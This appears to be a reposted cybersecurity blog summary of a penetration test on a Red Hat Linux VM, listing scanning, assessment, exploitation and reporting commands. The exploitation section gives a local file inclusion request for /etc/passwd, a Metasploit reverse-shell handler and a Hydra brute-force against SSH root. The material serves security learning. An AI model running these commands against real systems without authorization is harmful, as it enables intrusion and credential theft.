Penetration Testing on Red Hat Linux VM: Key Takeaways and Techniques

Recently, I conducted a penetration test on a Red Hat Linux VM, applying everything I’ve learned in cybersecurity to identify and assess vulnerabilities. This project was a deep dive into real-world security testing, and I wanted to share some key takeaways:
– Scanning & Reconnaissance – Used Nmap, Nessus, and Nikto to find open ports and outdated services.
– Vulnerability Assessment – Discovered weak SSL/TLS settings, outdated Apache/PHP versions, and SSH misconfigurations.
– Exploitation Attempts – Tested for LFI, RCE, and SSH brute-force vulnerabilities (some worked, some didn’t—documenting both was key!).
– Reporting & Compliance – Mapped findings to MITRE ATT&CK and ISO 27001 and put together a detailed security report with an attack flow diagram.

You Should Know: Practical Commands & Techniques

1. Scanning & Reconnaissance

• Nmap (Network Scanning):

  nmap -sV -A -T4 target_IP 
  nmap --script vuln target_IP 
  

• Nikto (Web Vulnerability Scanner):

  nikto -h http://target_IP 
  

• Nessus (Automated Vulnerability Scanning):
• Install Nessus, then run:

  systemctl start nessusd 
  

• Access via `https://localhost:8834`.

2. Vulnerability Assessment

• Check SSL/TLS Weaknesses:

  openssl s_client -connect target_IP:443 -tls1_2 
  testssl.sh target_IP 
  

• Check Apache & PHP Versions:

  curl -I http://target_IP | grep Server 
  php -v 
  

• SSH Security Check:

  ssh-audit target_IP 
  

3. Exploitation Attempts

• Local File Inclusion (LFI):

  curl http://target_IP/vulnerable.php?file=/etc/passwd 
  

• Remote Code Execution (RCE):

  msfconsole 
  use exploit/multi/handler 
  set payload linux/x86/shell/reverse_tcp 
  exploit 
  

• SSH Brute-Force (Hydra):

  hydra -l root -P passwords.txt ssh://target_IP 
  

4. Reporting & Compliance

• MITRE ATT&CK Mapping:

  Use ATT&CK Navigator (https://mitre-attack.github.io/attack-navigator/) 
  

• ISO 27001 Checklist:

  Use Lynis for Linux auditing: 
  lynis audit system 
  

What Undercode Say

Penetration testing is not just about exploiting vulnerabilities but understanding risk management. Always document failed attempts—they reveal security gaps. Automation (Nessus, Nmap) speeds up recon, but manual testing (LFI/RCE checks) is irreplaceable. Compliance frameworks (MITRE, ISO 27001) help structure findings professionally.

Expected Output:

• A detailed penetration test report with:
• Vulnerability rankings (Critical/High/Medium).
• Remediation steps (e.g., update Apache, disable weak SSH ciphers).
• Attack flow diagrams for visual context.

Relevant URLs:

• MITRE ATT&CK Framework
• Nmap Documentation
• Nessus User Guide

References:

Reported By: Saad Khan – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram